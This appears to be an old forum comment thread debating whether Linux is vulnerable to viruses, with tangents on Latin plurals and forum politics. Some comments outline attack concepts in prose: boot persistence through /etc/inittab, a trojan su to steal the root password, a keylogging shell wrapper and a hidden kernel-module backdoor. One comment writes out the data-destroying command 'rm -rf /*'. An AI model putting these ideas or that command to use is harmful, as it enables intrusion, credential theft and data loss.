he just assumed that more malicious coders + more popularity = more viruses.
This assumption is supported by the fact that most viruses attack Windows systems today. Why? Because most systems connected to the Internet run Windows.
I took some time explaining that Linux was different because of a) availability of source code
The availability of source code allows a virus writer to find weaknesses that a virus might exploit...period. You can argue that the availability of source code allows more people to look for security holes, but it does not itself prevent exploitation of security holes. On the contrary, existing security holes become vastly easier to exploit when the virus writer can see exactly how the source code works.
b) permissions
Viruses defeat permissions by exploiting weaknesses in system software or application code...that is their function. To cite "permissions" as protection from viruses is like saying that burglaries can't occur because people have locks on their doors.
c) the extreme wariness of the average Linux user of running untrusted binaries.
The whole point is that the definition of the "average Linux user" will change dramatically as Linux becomes more widely used. The average Linux user will no longer be a person who has time to catch and install every security patch that happens to be issued. The average Linux user will be someone who just wants to get their job done without having to learn to be a system administrator.
If the guys who coded the daemon didn't do a good job, a virus writer might be able to swing a buffer overflow with a properly coded get request. I don't know off the top of my head exactly what effect overflowing a buffer would have in the kernel though.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
You could also not allow users, which is a much more sensible solution for 90% of the Linux using population. Most users don't have the know-how to lock their system down well enough to prevent a user from exploiting a buffer overflow. The general rule of thumb is if you don't trust a user with root, don't let him on your system.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Right?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Once the linux kernel starts, it takes over (hence the reason loadlin works out of dos, etc) and the loader does nothing else, in fact it can't. So in boot partition or not, it only effects the loader, so it is a loader virus, not a linux virus. Now if they just recreated the boot sector (hence loader) virus, they have done nothing special. But if you are like me, your write down your partition tables on the side of the pc anyways...since my friends have root and love to delete partition tables.
I already have it on my Linux box. It installs itself in C:\WINDOWS and causes your computer to freeze at a blue screen. I am very scared. Quick, someone write an anti-virus program that will clean this from my computer.
...the system.
/etc/inittab. Bingo! The malicious code is started at boot, can have root privileges and it can use the network to bootstrap/download a more sophisticated/larger/updated version of itself and so forth, link itself into other "normally running processes" whatever...
It doesn't need to infect or modify the kernel at all. All it needs to do is copy itself into the filesystem somewhere and insert a line into
Imagine a virus-ized version of syslogd, init itself, or any other core component.
Once you have access to an unprotected file system, you can do whatever you want. The virus might even be able to run under windos and access the linux partitions directly. Forget infecting LILO, dual boot boxes are dangerous no matter.
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
> Certainly all of /usr and /boot should be read only. New programs added later should go in /usr/local which can be a separate partition, and even that should be read-only except when you actually add stuff.
/boot as read-write for when you want to update your kernel ?
Are there any HOW-TOs that explain how to do this?
i.e. How do you mount
Thx.
Melissa is an interesting and very virulent virus.
But one highly unlikely to infect *nix boxen because all the key executables are unwritable by the user.
The same goes for *nix office suites _unless_ they allow execution of user binaries, or have dangerous macro commands. The latter is quite likely because some people want to do bulk mailings so Melissa workalikes could thrive.
There is also the diversity safeguard. It is easy for viruses to spread in the MS-Windows world because there is basically one OS run on a great number of machines. Monoculture. *nix is fragmented, and hence more difficult to attack.
-- Robert
Some of my friends send email alerts for new virus and related stuff. I always reply saying: "Format your hard-disk and install Linux. Happy Virus-Free computer experience!"
With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.
Suggestions:
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
> In the US more than 95% of the privately held land is owned by only 3% of the population.
Do you mean most people not having Allodial Title for their land ?
Do you happen to have a link to the source of that data?
Thx.
>I may be one of the only Slashdot geeks to have majored in Classical Languages ...
Indeed, you might be the only one, but some of us out here still enjoy learning something new everyday, and I will mention that good grammar and spelling is also appreciated by the literate among us.
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
from the article:
>... have successfully completed one such prototype: the result is a fully functional and potentially virile Linux virus.
i was more or less under the impression that "virile" (from latin "vir" meaning "man," i believe--akin to "puerile" from "puer" = "boy") referred to the sexual capability of a male, and that the correct word to describe a particularily nasty virus was "virulent." anyone want to correct me?
And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.
And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.
And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Yes, that's true. But, remember, Linux is not just a server OS. More and more people are starting to use on there home machines. And I really doubt that those boxes could be called "properly administered". if Delmoi's files get deleted, and Delmoi is the only user account, All that good security isn't going to be worth shit.
Anyway, I'm not saying that Linux is anywhere near where Windows is in viral susceptibility, but it is possible, and still not a good thing..
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
The upshot is that users in the know back up their critical data on a regular basis. If you can't be bothered to do that, don't expect any sympathy from anyone.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
But, you wouldn't need to rewrite the Disk File. Just make an app and stick in the ~/.bashrc file or whatever. This would be detectable, but most people probably don't check there .bashrc files that often.
The idea I had was this, write a program that when run presents the user with a shell prompt, anything typed in gets passed to the bash shell underneth it, exsept keystroeks are recorded. The program is 'loaded' when the user starts the trogen, and sort of sits betwen the user and the TTY, if posible, otherwise between the TTY and bash. It captures input and output, and can see if someone uses su.
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
Tripwire takes checksums of all your important files, a major feature in many antivirus programs. Write your checksums to a zip disk, set the read only tab and check them every few days.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
funkman has hit it right on the head. As has been discussed before on Slashdot, most out-of-the-box installations are not very securely configured. It will only take one "virus" or trojan horse to attack one such distribution to give Linux a bad reputation for quite a while, no mattar how we respond after-the-fact. If the Linux community doesn't want to get a reputation for slipshod security among _average_ users, we have to address this problem before it happens, and with all the major distributors.
Most modern unices have some form of configurable resource limits. Things like number of processes, amount of memory, CPU usage, etc. can usually be limited per user, making "attacks" of this nature worthless.
Disk quotas can prevent users from filling up filesystems, also.
I mean it :)
Unfortunately, as Linux gains a reputation as being an alternative to Windows among desktop users, and begins to replace Windows in the desktop and especially in homes, the culture is going to change. People _will_ start e-mailing "Elf Bowling" and other executables to each other. After all, they could do it on Windows, and all those Linux gurus keep saying Linux is more secure... Security is at least 50% people. If we win the desktop war, the virus wars will not be far behind. Not because of technology, but because of people. Do we really want to win the desktop war?
-Elendale (gets that stary-eyed face)
IANAT (I Am Not A Troll)
...your dual boot firewall and how all of /etc/rc.d.... is protected from anything while the "other" os is running.
The plural of "virus" is "viruses". It was not a 2nd declension masculine noun in Latin, and therefore does not go to "-i". And it was not "-ius" like filius, so definitely doesn't go to "virii". See Tom Christiansen's page about this.
The plural of "virus" is "viruses", not "viriiii.
The plural of "virus" is "viruses", not "viriiiii.
I know that for some people tweaking thier computer is practically the point of owning one. But I use mine as a freelance writer. The "root is safe so don't worry" attitude makes me think of a bank that has a super modern secure vault. But they know that everytime they open it to put something inside, someone could catch the combination or get a clue of how to break it open. So they keep all the money and valubles outside the vault and pride themselves on the fact that they have perfect vault security!
...will work for Chick tracts...
I found this post to be rather interesting but I know the story behind Linux virii. What I want to know about are virii that exist on the Mac and BeOS platforms. Do they exist? Are they a major problem? What are the technical details behind their existance or lack thereof?
...let me see if I can zip back up the history...
Not dual boot firewalls, but the vulnerability of linux when running windos on the same box.
So of course neither you nor I would dual boot a firewall or server, and as a workstation, running vmware is looking more and more attractive each day. Hmm, have you told the vmware folks about the security ADVANTAGE that their software gives linux users who would otherwise dual boot?
I've been using Linux for several years now and have been pretty happy with it. If what you say about Ishtar is true, however, I'll have no choice but to ceremonially burn all of my CDs and hard drives. I suppose next you'll tell me FreeBSD was behind "It's Pat".
correction gratefully received. I just checked my source and found that the phrase I remembered was "enculer les mouches".
"Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls"
/bin/ls or explorer.exe to the kernel modules or kernel32.dll, and short of booting from a known clean floppy and reinstalling there's no way to be certain that a running virus isn't hiding itself from virus checkers (which isn't hard), maliciously attacking personal files repeatedly.
Not quite true. If a virus deletes my entire home directory, and I'm smart, I just whip out the latest backup CD-R and do the restore as root. Voila, no more virus.
On the other hand, if a virus infects my system running as root or infects my Windows system, there is nothing short of a reinstall I could do to make sure my system is secure. That virus might have infected anything on the system, from
And frankly, I have to reinstall Windows often enough when it's virus-free. I haven't reinstalled Linux in years, and I'd like to keep it that way.
All the virus has to do is create a trojan su program in the user's home directory, alter the path, and the next time he tries to run su, the virus gets his root password.
Download a program to your computer
Port it to your architecture and configuration
Compile itself
Install itself
Run itself (as root nonetheless)
All without the user even noticing!
If you log into a Linux box with the most powerful account you have and type rm -rf /* and press enter, will do as much damange to a linux box as any virus could. Recursivly Force Removal of all (/*) files. Account premissions make this kind of power controllable..
Using linux is not the same as using Windows, in fundimental ways. Any parallels that people draw are almost certain to be wrong if you talk to a real expert.
?
Thats a great idea. Mind if I send it to David Ranch? (so he can incorporate it into his Securing Linux Doc aka "Trinity OS")
Securing Linux - Trinity OS
Cheers
Well, look at the Linux/Stoag computer virus. It does exactly what we're worrying about in exploit bugs.
Linux as an operating system is, in actuality, a lot more insecure than we'd like to admit. To prove my point, look at RedHat's Linux 6.1 Security Advisories page. How many of these packages were fixed to prevent root exploits? Five of thirteen. But look at how common some of these five are!
Malicious people can use lpr of all things! Another famous example: bind. Or how about wu_ftpd? Those two, alone, are present alone on how much of the linux community?
Honestly, were it not for freshmeat.net , I probably would not have discovered the existance of the new packages. (I don't check RedHat's site often. And I don't signup for mailing lists either... So this is my fault.)
There are script kiddies out there who can manipulate the overflows in bind. (Please, for the love of God, if you haven't updated to bind 8.2.2_P3, go do so!) If a script kiddie can find a way to do that, then some coder worth his paycheck can probably figure out a way to have a program manipulate itself into root that way.
I mean, all some perverse (or highly bored) programmer has to do is write a program to manipulate those bugs to get root... And then run rm -rf / to kill your machine. (There are, of course, nastier things one could do, but the less ideas I generate for others, the better.)
By no means, are we safe. Linux virii will eventually be created and released into the wild. (There are even some that claim that MicroSoft will be the origin for the epidemic.)
The only way we can keep ourselves truly safe is to catch security holes before the other side does and update our source packages before the attacks start.
There is a saying in network security: "One loose link is all you need."
--CAE
In the MS world, the most potent and prevalent virii are macro viruses. Over time, MS built in limited forms of checks to prevent the average user from doing bad stuff to themselves, although the problem is still bad.
The KOffice team are about to release a product that has corba access to all other components and is scriptable using python. Python has no security model and can import many useful modules to do pretty much anything you could do via C or C++ to your system. If a Koffice script can look up your address book via the ORB and run system(), Melissa/koffice is well on the way to being written - and very successful with those running Koffice.
Linux is not immune to virii, and never will be. Most distributions are out to win the tick box war, which means packages+++. I can assure you that no one has the time to check all the packages being installed; and some of them are huge. So bugs will be there, which creates exploit opportunities. Just one common get root exploit is enough to allow a virii to propogate easily.
A smug smart arse attitude to Windows users will not help once the virus kits start getting distributed. Take the problem seriously, and use proper precautions:
Andrew van der Stock
As we all know, the best viruses come from Australia. In the case of linux viruses, check the mailing list archives maintained by Silvio.
Who is an all round cool guy.
How we know is more important than what we know.
Indeed an amusing article (the ZDNet one). However, a couple of weeks ago, I happen to have written a piece that I think does comprehensively cover the question: http://linuxmafia.com/~rick/faq/#virus
I wrote that after I was ask about Linux virus-checkers once too often.
--
--
E2 IN2 IE?
Well, the news is not easy to take, and I never claimed that it was. Nevertheless I believe that it is fundamentally better that Linux users know the truth. Yes, you can go on deluding yourself, but in the long run, you only hurt yourself if you hide from the truth.
I suppose next you'll tell me FreeBSD was behind "It's Pat".
This is true. Not only was FreeBSD behind this movie, it was also behind several other movies that were less-than-high-quality:
- A Night at the Roxbury
- Mom and Dad Save the World
- Howard the Duck
- Plan 9 From Outer Space
I hope you can see why FreeBSD shan't be allowed, now or ever.BTW, who has the most to benefit from that article? AV company reports virii attack from the "evil" Chinese. Hysteria, another white collar meat.
I think I echo the other anti-NT comments by saying:
:)
"You would have to eat 12 bowls of Windows NT to get the features found in one bowl of Linux! Also, NT is lacking in Iron, Stability, Support, and other vital nutrients."
Please, guys, keep it funny. It's a funny post.
Or, for the English-impaired:
grep -iv FUD funny.post
---
pb Reply or e-mail; don't vaguely moderate.
pb Reply or e-mail; don't vaguely moderate.
I wrote a good portion of the "proper reading" on computer viruses.. the term "virii" is a valid collective term.
How we know is more important than what we know.
Only the virus boot loader needs to fit within 512 bytes. The bulk of the virus can reside elsewhere on the disk, loaded by the few dozen virus bytes added to an infected LILO. Hardware is so fast today, who would notice a 5MB virus loading?
However, most newbies don't run any binaries (or even scripts) that they have write access to! How is a file infector going to work if all their executables are owned by root and they don't have write access?
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
Linux is a UNIX clone. Duh, of course it copies UNIX.
The security system is pretty much sound if you don't run as root. Running a virus infected program as a user will only destroy that which you have access to... a far cry better than DOS to be sure. Besides, even the most secure NOS can be defeated by an incompetent user. Good security habits are just as important as a good security model.
Here's my DeCSS mirror, where's yours?
I was coding a Perl piece the other day, and I hadn't done so in a while, and it'd gotten pretty messy. Anyways, it turned out that there was a variable assignment that was supposed to assign a string to a variable, but the subroutine from which it was called had the same name (I'll be using quotes more often now. :). Turns out that Red Hat 6.0 has no user limits set, and that any user can bring the whole system down just by writing a simple script that keeps calling itself and bogs up all the memory, then the swap space, and then it began shooting off random processes... well, you know how it goes. This surprised me quite a bit. I'm sure there must be other distro's out there that have this problem, and I call it a problem, cause I think that this is not something that every admin should have to think of when installing their system.
Cheers!
Costyn.
The Official Steve Ballmer Webpage
Yeah, good Tori Amos single, but on the album I like Concertina at the moment. :)
/. users
Yes, this is off-topic. Moderating it down is silly, because it says "Off Topic" at the top, so save your points guys.
Anyway, I said something useful further up, and this "news" is just hype generated to sell a product as others have said. Look deeper
Until now it seems Windows is a virus but there are fundamental differences: Viruses are well supported by their authors, their program code is fast, compact, and efficient, and they tend to become more sophisticated as they mature.
So, Windows is not a virus.
(credit unknown)
maybe you'll find this entertaining :-)
Unknown
or just annoying
Doesn't quite qualify, but hazards come from unexpected places.
i dont believe that my box will ever be infected with a virus since linux is very secured and i control on every file by myself. but lets continue to my main point i want to bring up, if, and there's a chance, that there will be a virus for linux, viruses, Anti Virus programs will be written so quickly, because most of linux users have a background in programming, or they are programmers theirself. and same as linux was developed by hackers, if it's anti virus will be developed again by hackers, no anti virus from the windows platform would compare to it. same with exploits, as a security hole is found on linux, an exploit will be written quickly, and a fix will be written even faster, and will secure your system in 100%. but still, i dont think there's a reason to be afraid from viruses for linux.
Dan.
Hackers, way back when (probably during the mid-80s), started (erroneously) using the plural "virii" for computer viruses, and it became "correct" through years of use. This is similar to the sitaution with "octopus." Technically, the plural of "octupos" is "octopoda," not "octopi." This owes to the fact that "octopus" isn't Latin, but Greek ("octo" = 8, "pus" = foot.) But, folks have been (erroneously) using "octopi" for so long that it has become correct.
Just a little factoid to help you in Trivial Pursuit.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
And "virii" is pretentious h@k3r t0k. Stick to English plurals if you can't rattle off all five Latin declensions in each of three genders, plus irregulars.
Me can say somethun lotsa timez, d00zersmartz, but that's not sufficient to make it "correct".
What a bunch of clowns. Go back to take those classes you skipped.
Of course, the obvious response is to run MS Office as root... in a chroot jail! It will be worth the hassles to have the obvious desktop icon.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
How do most virii work? The big headliner virii always seem to be written to exploit certain flaws or features in software. The reason that these flaws can be taken advantage of seems to be twofold:
So, I'm not going to argue for or against Linux per se, but I think open source software really does defeat the above points most of the time.
The other point that has been raised by many others in this discussion is the intrinsic multiuser aspect of Linux. The fact that a multiuser environment is all but mandatory with Linux makes people follow rules for access and priveleges on a system, which is great for stopping virii from propogating via priveleged access. Sure, Windows (among others) may provide the ability to function semi-multiuser but it's not nearly as enforced as on Linux, which means people can get lazy and run everything under a priveleged account. So Linux isn't necessarily better at being secure (don't hit me hehehe), but it is better at training people to be more secure. I'm sure if programmers and users of Windows based systems had enforced access/security in a multiuser system then Windows security holes would be patched much quicker, especially in the applicaiton layer. Programmers simply wouldn't be able to assume that their programs had complete access to the system - they would have to write checks into their code to make sure of it, and users would have to enable access for programs that required priveleged access. That might take a little bit longer for users to install/run programs, but it's much better than the current "double-click suck it and see" method where you've got NFI how to restrict what a single program can access on your system.
-------------------------------------------------
email
email me or not.
How do most virii work? The big headliner virii always seem to be written to exploit certain flaws or features in software. The reason that these flaws can be taken advantage of seems to be twofold:
So, I'm not going to argue for or against Linux per se, but I think open source software really does defeat the above points most of the time.
The other point that has been raised by many others in this discussion is the intrinsic multiuser aspect of Linux. The fact that a multiuser environment is all but mandatory with Linux makes people follow rules for access and priveleges on a system, which is great for stopping virii from propogating via priveleged access. Sure, Windows (among others) may provide the ability to function semi-multiuser but it's not nearly as enforced as on Linux, which means people can get lazy and run everything under a priveleged account. So Linux isn't necessarily better at being secure (don't hit me hehehe), but it is better at training people to be more secure. I'm sure if programmers and users of Windows based systems had enforced access/security in a multiuser system then Windows security holes would be patched much quicker, especially in the application layer. Programmers simply wouldn't be able to assume that their programs had complete access to the system - they would have to write checks into their code to make sure of it, and users would have to enable access for programs that required priveleged access. That might take a little bit longer for users to install/run programs, but it's much better than the current "double-click suck it and see" method where you've got NFI how to restrict what a single program can access on your system.
-------------------------------------------------
email
email me or not.
Me can say somethun lotsa timez, d00zersmartz, but that's not sufficient to make it "correct".
So what makes a piece of language (or any other quasi-standard, for that matter) correct if not popular support? Maybe English teachers all over the US get together once a year and decide what is and is not correct English, right? I know, I know-- such a symposium is entirely unnecessary: we have the ACs to hand down the absolute, final word on the right way to do things. It's really weird that so many folks who know everything won't sign their name to their divine declarations.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
I didn't realize until the above commented got moderated as such - oh well, here goes!
My understanding is that their Lisp implementation has enough security built in to avoid the problem...
:-)
Cheers,
Ben
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
I'm all for the evolution of language, but English usage is determined by usage over time by published sources. Magazines, newspapers, books, etc. They've all accepted "octopi", and almost all have given up on "these data", but all credible publications I know of (newpapers, books, magazines) still use "viruses" only, so it is too soon to call virii "accepted".
Isn't that where the uberdistro, LinuxOne is supposed to be making inroads?
In other news, I have just received some disturbing information. It appears that the champions of Free Speach (TM) and Open Source may be hypocrites.
First, I appreciate the contribution of source code for Slash, but am disturbed that "its a lower priority to me than it ought to be." The source code is heinously out of date, and I can't see why it has yet to see as much as a snapshot posted of a more updated version.
Second, even more disturbing, is the the gag order that I has just been brought to my attention. As the story goes (I am going only by what I am told from the other person involved), an aquaintance of mine has recently been sent an email in which CmdrTaco himself has ordered the aforementioned aquaintance to refrain from posting. Furthermore, the letter alledgedly contains a threat of banning an entire network's access to the entire Slashdot site. I am reminded of various sources, not the least of which is the Bible, which contain the same sentiment as Sir William Blackstone when he rightfully stated that "it is better that ten guilty persons escape than that one innocent suffer."
Sorry for the off topic, but, like a facist dictatorship, there is no area where one may openly post his or her view of the regime.
"Virii" is a good usage, here, primarily because it has a history in Geek culture. The fact if it being both a pretentious and incorrect usage says something important about the difference between a hacker and a cracker, and speaks volumes of the awkward self-consciousness that is our badge and shackles. The difference between "viruses" and "virii" is thus meaningful-- it encapsulates a subtle cultural/historical lesson about late 20th Century Nerddom.
Much Love,
"S"HM
*****
(I refuse to spellcheck out of contempt for your belief system)
In a class called "Computer and Network Security" taught by Ron Rivest, a group of students did an interesting project on how one might completely destroy the security of a Linux machine. To wit:
One could write a kernel module that doesn't allow itself to be listed with lsmod. It even steps on certain system calls so that the file containing it doesn't get listed with ls. It also adds itself to several key executables but alters the system calls so that the file sizes don't appear to change. It provides a backdoor that allows a cracker to own the machine remotely, and disables any kind of logging that would result from the cracker's actions. This module could be sent through any kind of buggy network daemon, and spread like a worm. The machine's admin would have a hell of a time even discovering that the machine was infected! It seems that running a virus in kernel space gives you significantly more power than even running it as root.
Of course, the students didn't implement this virus/trojan/worm - it would require some crazy skillz, but they really had their bases covered when it came to design.
It should be noted that this kind of thing could probably pulled off on many different types of operating systems, and might be even more successful since commercial systems have more homogenous kernels (I can imagine all kinds of "unresolved symbol" errors with all the custom Linux kernels out there...)
Please.. the plural of "virus" is NOT "virii". It seems that very few experts in the field of computer viruses really calls them "virii", the term seems to have come from "script kiddies". At least, AFAIK. If anyone knows differently, please tell me, I'd really like to know if I'm wrong here..
Sorry, it's one of my pet peeves.
Backup-- You did back up his files didn't you? Perhaps a cron script that tar-bzips all files from a users home directory into an area with a different user ID would be useful in linux distributions.
Hey, that's funny. Your sig is almost exactly the same as my infoline on IRC, which is . :D
-emufreak
The original pleage was trogens but they died quickly from being easy to track down...
...."
:)
Linux viruses would be akin to Dos trojens.. easy to track down.. there is a REASON why *nix has a sereous trojen problem and vertually no virus problem while Windows has exactly the reverse..
While trojens can be tracked down easly *nix viri need root access.. Many users prefer to download source code.. true SOME go for binarys...
Also viri in order to move from system to system a binary has to find it's way from a victom machine to a new victom.. Sence users can download binarys from the original author or from a "trusted source" or a mirror of same the exposure is limited.
Back in the good old BBS days you downloaded from BBSes.. the binary on the BBS is unlikely to have come directly from the author but may have changed hands. The chances of passed through an infected computer is reasonable. The infected user will disinfect his system but the virus will remain on the BBS laying wait for a new victiom.
Sence users now download from a reasonable secure source the chances of the virus spreeding is reduced considerably. This is true for Windows and *nix. Not vanished but it dose make tracking down and permenently terminating a virus a likely event.
Archives now a days tend to contain source so if a user wants a binary they may have to go to the original author.
Finnaly if you do try to run software from root many applications issue scary warnings about doing so. If more programmers did this that would be enough to keep any newbe from trying to run stuff from root.
This dosn't compleatly eliminate viruses.. Viruses can (and as Linux grows in popularity WILL) attempt to use defects in Linux security to gain root. As this happends the defects will be repaired. Some viruses will attempt brute force attacks and Linux will be modifyed to detect such attempts and KILL the offending code.. and leave a user e-mail saying "Virus in
Basicly viruses in Linux will exist but have a short lifespan and a difficulty spreeding in the first place. Windows will also face thies problems.
Instead of worse viruses for Linux I see more efforts to explote Windows defects as Microsoft seems less intrested in fixing them. More e-mail viruses...
I also see attack programs phasing out viruses.. The reasonning is once trojens could sereously criple whole groups of users.. not anymore.. they are easly cought and distoryed... viruses replaced them as viruses can not be easlly cought but now viruses can be thwarted and tracked down, attack programs run on the offending users machine issolated fron any anti-whatever software...
It also gives the attacker that personal feel.. he can keep a bodycount. A virus in the wild is untracable even by the author. He only knows of his suceess from newsgroups... if his virus dies he may never know what went wrong.
Just my opinion... and of course.. I could be wrong... but thats allways true
I don't actually exist.
i think some of these companies would not like seeing reliable free software hit the mainstream because that would distroy thier market.
one more reason not to use commercial, closed source software in the first place.
A program run amok can fill up your entire drive, rather than just its partitions. It increases the likelyhood that files used together might be on widely different areas of the disk; increasing access time.
Now that you have a system in place and can make some estimates on the amount of disk space used, back it all up onto tape, repartition the disk, and restore.
And if you don't have a tape drive or other backup media, get one. You'll need it anyway.
Uhh, okay, backup is a last resort, at best, against data loss, you prefer this not to happen at all, so get the backup stuff out of your head. Each lost file amounts to 2.5x the amount to recreate the file, with no backup, which is really kind of silly for a huge (hell, even small-large) corperation to do on all their machines. They usually save all files on a network drive, anyway.
/usr/* /root/backup or however the syntax goes (I lost my linux partition and I haven't bothered to get it back, and I'm still a newbie, so). I'm sure the files could be copied to a network drive for a "better" (tape, CD-R, whatever) backup method.
Okay, but how about this. Assume a desktop machine with *enough* hard drive space, once a day, at about, say, 5 am or some absurdly strange time for the user to be working, a cron script is started with a cp
I mean, windows doesn't work this way, but if all the users made sure to plop their docs in "c:\My Documents" a similar windows script could be made (using scheduler and a batch file is how I would do it).
I still think prevention is better, I mean, I don't want the bank robbed every day just because of FDIC insurance or my car broken into because the insurance company will pay for it, ya know?
later
Dan
until MS proved them that it was possible to catch a virus through email.
Over the last few years, the terms hacker and cracker have tended to merge in the minds of the public ( to the digust of both hackers *and* crackers ), so arguably, a new term is needed.
My suggestion is : how about 'Quacker'?
Quacker : an individual who uses their computer for intentionally malicious and/or destuctive activities, as oposed to hackers ( who love to write code ) or crackers ( who love to test system security ).
While we are at it, we could also start 'Quack' magazine, as a parody of Phrack. My main problem with most "script kiddies" is that they take themselves way too seriously.
[Elmer Fudd mode]
"He, he, he. You wascally compooter quackers! Don't you know it's quacker hunting season!"
[/Elmer Fudd mode]
Just another mindless attempt at humor.
Firstly, the plural of the English word 'virus' can only possibly be 'viruses'. In English, -us words derived from Latin form the plural by appending -es, and -us words derived from Greek form the plural by exchanging -us for -i.
However, the Latin word 'virus' (from which the English 'virus' is derived) is not subject to English pluralisation rules.
There is a lot of doubt on the issue of the Latin plural because:
i) Latin 'virus' was a mass noun, meaning 'some poison', so was never actually used as a plural.
ii) in Latin, the same word can have different plurals depending on its usage. (This is where the terms 'genitive', 'accusative' etc. come in).
iii) It's thousands of years since the language was natively spoken anyway; and in those days no-one cared about standardisation of the language, so who the hell knows what it should have been!
(It is also relevant that using a Latin plural in English for 'virus' is inappropriate, as the Latin meaning of 'virus' is different to the English meaning of the word).
Notwithstanding the three reasons just given, there are a few tries at forming a Latin plural for 'virus', each of which is arrived at by applying 'rules' of Latin grammar which were deduced by reading ancient works (which had fairly loose grammar anyway).
i) virii. Note that this is viri with a macron over the 'i' (indicating long vowel sound), and not a diphthong as in English. It is infact pronounced like the English word 'wiry' (just to confuse things more). Similar Latin nouns occur in the 'troll' that I am replying to.
ii) virora, vire, viruus. These come from attempting to classify 'virus' as a different declension ('declension' is the technical term for what sort of noun a noun is, for the purposes of pluralisation; there are five groups), and applying that declension's pluralisation rule. Note that the 'uu' in 'viruus' is a long vowel sound, like the 'ii' in 'virii'.
Conclusion: when writing English, use the English plural 'viruses'. When writing Latin, you will never need a plural of the word.
Linux, where you get more Geek Chic for finding the bug than exploiting it.
Viruses are on the way, and will most likely be even more attractive for Linux than WinXX. By writing a WinXX virus, I have to fool a virus checker, and even then I can generally only affect the clients of an organization. And if you have the "." in your path?? You're a great target. Plus, I can just start taking out your linux machines, your print servers, your databases, have a trojan report back keystrokes and network stats until it blows up?? Doable. And the virus will most likely not be open source.
Plus, what about companies like Norton?? I have this sneaking suspicion that they actually create some of these viruses, both to increase the value of their own product, and to devalue the product of a competitor. (You'd be surprised at the viruses I've seen that only one virus checker can find when they all have updated defs.) I know that this delves into the realm of conspiracy theory, but if theres a Dr. Solomon's for linux, there will have to be a virus for it to find. And if linux gets a good mindshare....
P.S. I wrote quite a bit of Unix virii back in the day, and it ain't that difficult.
Just My 0.02
Jason
A computer savvy person does not run a linux box as root, or a NT box as administrator.
A computer savvy person uses an upgraded anti virus program and keeps track of discovered bugs and security flaws.
A computer savvy person knows that bad things happen sooner or later and backs up data.
However, Linux is slowly entering the realm of the non-geeks.
They will run their system as preinstalled.
They will not update their system when a bug is discovered (and fixed)
They will run as root if it saves them the trouble of remembering *two* passwords.
Hey, these are the people who has their password on a post it note beside the screen!
Security in an open source system works because the user is coresponsible for the system
Windows main security problem is that it is designed to fit the both the clueless and the pro.
Now for the big quetion:
How can "we" avoid that Linux falls into the same trap? Is it better that Linux remains a OS for the pros, or is it possible to make a secure "install and forget" open source system?
All opinions are my own - until criticized
well, I don't know what version of RH you're running, but the easiest way for 6.1 (which, as far as I'm concerned, is really the first release that I really like) is this:
$ su
Password: *******
# linuxconf
:)
from here, try Config | Networking | Client Tasks | PPP/SLIP/PLIP
it's VERY easy to set up from there -- even on my laptop, where the modem changes frequently, as well as the area code and ISP.
if you run gnome, you'll notice that in [BIGFOOT] | Panel | Add Applet | Network there is something called Modem Lights. click on the little button. it dials for ANY user if the check box is checked in linuxconf.
hope this helps.
Lea
I wasn't talking about friends having root access! I wasn't talking about any virus altering the partition table! I was talking about if a virus is run in dos or from the mbr or wherever it can put files in a linux filesystem regardless of whatever passwords or whatever you have.
This is damned obvious. At this stage THE KERNEL HASN'T STARTED YET!!!
Will people stop assuming that people who say "unpopular" things (like a linux machine can be compromised with a big enough sledgehammer) are pig ignorant newbies (which i'm NOT)
And it was realy funny. I wonder how many people (newbies) had to reboot after that :^D
With the amount of complaining and nagging i have seen coming from the general LiNUX population in the last few months, a few virii don't look like that much of a bad thing to have.
I am sure i am no better for complaining about it myself but i am sick of hearing about the crap that is circulating. So much for the rules of advocacy!!!
p.s: it is my understanding that the plural form for anything of latin origin ending in s is converted to i. eg cactus = cactii. (thought it was worth the note =0)
---------------------------------
Better watch out for that penguin. i've heard he smashes windows.
Wrong. Octopi is not a word. Get a clue.